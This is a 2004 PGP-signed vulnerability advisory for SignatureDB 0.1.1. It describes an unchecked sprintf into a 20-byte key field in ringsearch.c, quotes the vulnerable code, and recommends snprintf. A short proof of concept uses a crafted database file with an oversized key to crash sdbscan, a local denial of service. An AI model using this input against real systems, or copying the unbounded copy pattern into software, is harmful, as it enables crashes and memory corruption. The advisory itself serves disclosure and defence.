-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - File: LynX-adv4_SignatureDB.txt Date: 15/02/2004 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - o NAME: problems with database files in 'SignatureDB' o CLASS: denial of service (DOS) o PROGRAMM: SignatureDB [http://pldaniels.com/signaturedb/] - Affected versions: 0.1.1 - Immune versions: - o OS: Linux and UNIX clones o VENDOR: Paul L Daniels o DESCRIPTION: 'SignatureDB' is actually two components, a signature database which is available on the internet, and a 'signatureID' program, which scans your files. You can in effect consider 'SDB/ID' in the same way you consider and use an 'AntiVirus' program, but 'SDB/ID' are aimed at a slightly different sector of the industry. Its purpose is to provide signatures/fingerprints of common, annoying emails/files, not specifically viruses. o VULNERABILITY DESCRIPTION: 'SignatureDB' package contain 'sdbscan' program, which scans files, in according with specified database file. It is possible to create a big 'key' parameter in this file, that will reduce to 'Segmentation fault'. Function which work with contents of database files, are located in 'ringsearch.c' file. After '#' - going my comments. Cut from file: 'ringsearch.h' ... 33 struct _infonode { 34 char key[20]; 35 char *comment; 36 int major; 37 int minor; 38 int flags; 39 }; ... Cut from file: 'ringsearch.c' ... 537 int RS_load_keys( struct _snode *parent, char *fname ){ /* # where 'fname' - database filename */ ... 541 char line[10240]; /* # allocating memory for 10240 bytes, and then use */ /* # only 1024, maybe author was mistaken and last 0 */ /* # is unnecessary :) */ ... 562 while (fgets(line, 1023, f)){ ... 582 sprintf(info->key,"%s",key); /* # size of 'key' are not checking, its */ /* # can be =< 1018 bytes, and size of */ /* # 'info->key' is equal 20 bytes, so */ /* # 'info->key' can be overflowed */ ... Its only first version of 'SignatureDB', so i think that in the next versions this problem will be fixed. P.S. Sorry, for my poor english :). o VULNERABILITY PREVENTION: Instead of using 'sprintf' function, will be more correct to use function 'snprintf'. o EXPLOITING: It is possible to specify configuration file for 'sdbscan' program, in this file you may type path to your own database file, which contents can cause buffer overflow and then 'Segmentation fault'. Example of exploiting : [LynX@ /tmp]$ cat my.conf dbfile=/tmp/fake.db verbose=1 fastscan=0 fastexit=0 [LynX@ /tmp]$ cat fake.db AAA ... '1000 x A' ... AAA:1:1:1:1:A:A [LynX@ /tmp]$ sdbscan --conf_file=my.conf Segmentation fault (core dumped) [LynX@ /tmp]$ o VENDOR RESPONSE: I sent notification mail to the Paul Daniels and did not received an answer. o CREDITS: - Thanks: nob0dy, netc0de, Xarth - Greets: R00T T34M [http://rootteam.void.ru], void, LimpidByte, - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Discovered by LynX <_LynX@bk.ru> / close your eyes & dream with me / - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAkAv8HMACgkQjvZ3gq5fCnGA8gCgnqItklxup0YzArOkT6nn+kNI 5BgAoOf+SFgV1vXH73RcdzIWXbdXa8NK =iIIl -----END PGP SIGNATURE-----